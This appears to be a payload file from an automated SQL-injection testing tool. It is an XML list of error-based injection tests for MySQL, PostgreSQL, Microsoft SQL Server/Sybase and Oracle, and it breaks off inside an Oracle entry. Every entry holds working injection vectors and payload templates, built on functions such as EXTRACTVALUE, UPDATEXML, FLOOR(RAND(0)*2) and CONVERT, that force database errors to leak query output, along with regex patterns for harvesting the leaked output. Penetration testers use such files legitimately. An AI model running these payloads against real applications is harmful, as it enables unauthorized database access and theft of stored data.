    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<root>\n    <!-- Error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->\n    <test>\n        <title>MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>\n            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>\n            -->\n            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.5</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <!-- It does not work against ORDER BY or GROUP BY clause -->\n        <title>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>\n            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>\n            -->\n            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.5</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>\n        <request>\n            <payload>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.5</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (EXP)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>\n        <request>\n            <payload>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.5</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>\n        <request>\n            <payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.6</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>\n        <request>\n            <payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.6</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>\n        <request>\n            <payload>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.7.8</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <!-- It does not work against ORDER BY or GROUP BY clause -->\n        <title>MySQL &gt;= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>\n        <request>\n            <payload>OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.7.8</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>\n            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>\n            -->\n            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1,2,3,8,9</clause>\n        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->\n        <where>1</where>\n        <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>\n            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>\n            -->\n            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>\n        <stype>2</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>\n            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>\n            -->\n            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>\n        <stype>2</stype>\n        <level>1</level>\n        <risk>3</risk>\n        <clause>1,2,3,8,9</clause>\n        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->\n        <where>1</where>\n        <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>\n            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>\n            -->\n            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>\n            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>\n            -->\n            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,2,3,8,9</clause>\n        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->\n        <where>1</where>\n        <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>\n            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>\n            -->\n            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>\n            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>\n            -->\n            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 4.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <!-- It does not work against ORDER BY or GROUP BY clause -->\n        <title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>\n            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>\n            -->\n            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 4.1</dbms_version>\n        </details>\n    </test>\n\n    <!-- This payload with AND does not work -->\n    <test>\n        <title>MySQL OR error-based - WHERE or HAVING clause (FLOOR)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,8,9</clause>\n        <where>2</where>\n        <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>\n        <request>\n            <payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL AND error-based - WHERE or HAVING clause</title>\n        <stype>2</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>\n        <request>\n            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL OR error-based - WHERE or HAVING clause</title>\n        <stype>2</stype>\n        <level>1</level>\n        <risk>3</risk>\n        <clause>1,8,9</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>\n        <request>\n            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>\n        <stype>2</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>\n        <request>\n            <payload>AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1,8,9</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>\n        <request>\n            <payload>OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>\n        <request>\n            <payload>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,8,9</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>\n        <request>\n            <payload>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,8,9</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>\n        <stype>2</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        